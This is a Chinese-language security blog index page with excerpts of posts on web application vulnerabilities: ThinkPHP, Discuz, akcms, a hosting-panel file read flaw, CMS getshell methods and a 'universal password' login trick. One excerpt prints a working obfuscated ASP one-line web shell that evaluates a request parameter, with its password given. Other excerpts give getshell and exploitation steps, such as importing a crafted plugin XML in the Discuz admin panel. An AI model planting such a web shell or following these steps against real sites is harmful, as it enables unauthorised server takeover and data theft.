Stay Hungry,Stay Foolish(求知若饥,虚心若愚。)——Steve Jobs

feed订阅 腾讯微博 新浪微博 twitter 你好,欢迎光临!

近日360库带计划中播报的ThinkPHP扩展类库的漏洞已经查明原因:系官方扩展模式中的Lite精简模式中存在可能的漏洞(原先核心更新安全的时候 并没有更新模式扩展部分,现已更新)。 对于使用标准模式或者其他模式的用户不存在此漏洞,敬请放心。3.2版本已经对扩展重新设计(原来的模式扩展、引擎扩展均不再支持),也不存在此问题。 ...
星外虚拟主机跨目录读取文件漏洞,需要一定条件。 问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令: c:\windows\7i24IISLOG.exe c:\windows\7i24IISLOG2.exe c:\windows\7i24IISLOG3...
漏洞一:鸡肋的getshell(需注册并能发布文章,需配合apache、iis6解析漏洞) 文件 /inc/artic_function.php //采集外部图片 function get_outpic($str,$fid=0,$getpic=1){ global $webdb,$lfjuid; if(!$getp...
一句话在下面: <% i=(Chr(-12590)) love=(Chr(-20306)) you=(Chr(-15133)) OK=i&love&you CNM=Request(OK) eVal CNM 'pass:我爱你 %> 密码:我爱你 

不可忽视的万能密码

2014.04.09, 漏洞发布 ,4条评论,4343人打酱油
前言:        第一次拿站(偶就读的学校)。。由于是第一次拿站,那时的是不知道fck,ewebeditor...的编辑器,不知道上传漏洞,不知道扫目录,不知道谷歌找后台,不知道...        只知道啊D可以扫注入,可以找后台。万能的啊D什么都可以干,有了...
新云网站管理系统任意文件可下载漏洞 漏洞版本: ACCESS和SQL版  漏洞描述: <% Dim url,strUrl,strPath url = Replace(Replace(Replace(Request("url"), "'", ""), "%", ""), "\", "...
逐浪CMS3.2 0day漏洞发布 [逐浪CMS3.2 0day漏洞发布 全文]Zoomla!逐浪CMS是功能强大的网站内核与管理系统,集成内容管理\OA\SNS\项目管理\采集\邮件订阅等强大功能,基于c#语言.net架构开发,是目前中国唯一同步支持MSSQL与Oracle两大数据库的高端CMS,用于快速构建高效门户网站 ...
Discuz X2.5最新版爆路径0day漏洞 漏洞证明:http://www.erdare.com/source/plugin/myrepeats/table/table_myrepeats.php   修复方案:加!defined(‘IN_UC’) && exit(‘Access Denied’);就好...
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day discuz x1.5 discuz 7.2 后台getshell 0day通杀版 方法为: 后台:插件--添加插件--请选择导入方式:上传本帖附件中的XML文件 并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误...

akcms注入漏洞

2014.03.25, 漏洞发布 ,2条评论,4127人打酱油
akcms注入漏洞 漏洞详情 披露状态:   2012-09-27: 细节已通知厂商并且等待厂商处理中 2012-09-27: 厂商已经确认,细节仅向厂商公开 2012-10-07: 细节向核心白帽子及相关领域专家公开 2012-10-17: 细节向普通白帽子公开 2012-10-2...